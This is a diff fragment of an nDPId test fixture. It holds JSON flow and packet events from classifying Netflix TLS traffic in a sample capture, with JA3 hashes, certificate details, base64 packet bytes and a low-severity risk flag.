-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032984,"flow_last_seen":1484319032984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032984,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1484319032984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032984,"pkt":"gCqoTGHM5JjWH70UCABFAABAh8JAAEAG+QHAqAEHNCDEJM97AbvHy0puAAAAALAC\/\/\/BrQAAAgQFtAEDAwUBAQgKH2S4hgAAAAAEAgAA"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032986,"flow_last_seen":1484319032986,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032986,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1484319032986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032986,"pkt":"gCqoTGHM5JjWH70UCABFAABAdf5AAEAGCsbAqAEHNCDEJM98AbvweU0rAAAAALAC\/\/+WPwAAAgQFtAEDAwUBAQgKH2S4iAAAAAAEAgAA"} -00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032888,"flow_last_seen":1484319032990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319032990,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} -01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032888,"flow_last_seen":1484319032991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319032991,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032896,"flow_last_seen":1484319033008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319033008,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
-01356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032896,"flow_last_seen":1484319033017,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319033017,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1484319033029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033029,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGl6g0IMQkwKgBBwG7z3ve3c1cx8tKb6ASRepkbwAAAgQFtAQCCAq2m8VuH2S4hgEDAwg="} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1484319033032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033032,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGlqg0IMQkwKgBBwG7z3xLWYWT8HlNLKASReoUTgAAAgQFtAQCCAq2m8VvH2S4iAEDAwg="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1484319033032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033032,"pkt":"gCqoTGHM5JjWH70UCABFAAA0rMBAAEAG1A\/AqAEHNCDEJM97AbvHy0pv3t3NXYAQEBXI5wAAAQEICh9kuLC2m8Vu"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032984,"flow_last_seen":1484319033033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033033,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1484319033038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033038,"pkt":"gCqoTGHM5JjWH70UCABFAAA0iIJAAEAG+E3AqAEHNCDEJM98AbvweU0sS1mFlIAQEBV4xgAAAQEICh9kuLK2m8Vv"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032986,"flow_last_seen":1484319033038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033038,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032984,"flow_last_seen":1484319033086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033086,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032984,"flow_last_seen":1484319033087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033087,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} 
-00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032986,"flow_last_seen":1484319033098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033098,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032986,"flow_last_seen":1484319033112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033112,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033206,"flow_last_seen":1484319033206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033206,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1484319033206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033206,"pkt":"gCqoTGHM5JjWH70UCABFAABAagpAAEAGFrrAqAEHNCDEJM99AbszkZRgAAAAALAC\/\/8LKQAAAgQFtAEDAwUBAQgKH2S5UQAAAAAEAgAA"} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1484319033258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033258,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGlqg0IMQkwKgBBwG7z33SmoRGM5GUYaASReoDCgAAAgQFtAQCCAq2m8WoH2S5UQEDAwg="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1484319033259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033259,"pkt":"gCqoTGHM5JjWH70UCABFAAA0m4FAAEAG5U7AqAEHNCDEJM99AbszkZRh0pqER4AQEBVneAAAAQEICh9kuYW2m8Wo"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033206,"flow_last_seen":1484319033261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319033261,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033206,"flow_last_seen":1484319033312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033312,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033631,"flow_last_seen":1484319033631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033631,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1484319033631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033631,"pkt":"gCqoTGHM5JjWH70UCABFAABAVMpAAEAGIQjAqAEHNkXM8c9+AbvPvqpAAAAAALAC\/\/9MiwAAAgQFtAEDAwUBAQgKH2S67gAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1484319033678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033678,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGi7Y2RczxwKgBBwG7z36\/HDHnz76qQaASRepQUQAAAgQFtAQCCAqFp1CVH2S67gEDAwg="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1484319033680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033680,"pkt":"gCqoTGHM5JjWH70UCABFAAA0\/p1AAEAGd0DAqAEHNkXM8c9+AbvPvqpBvxwx6IAQEBW0wwAAAQEICh9kux6Fp1CV"} 
-00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319033631,"flow_last_seen":1484319033681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319033681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319033631,"flow_last_seen":1484319033734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319033734,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01369{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319033631,"flow_last_seen":1484319033735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033735,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032888,"flow_last_seen":1484319032888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032888,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1484319032888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032888,"pkt":"gCqoTGHM5JjWH70UCABFAABA+AxAAEAGfcXAqAEHNkXM8c9xAbuJGKiDAAAAALAC\/\/+XvgAAAgQFtAEDAwUBAQgKH2S4KwAAAAAEAgAA"} 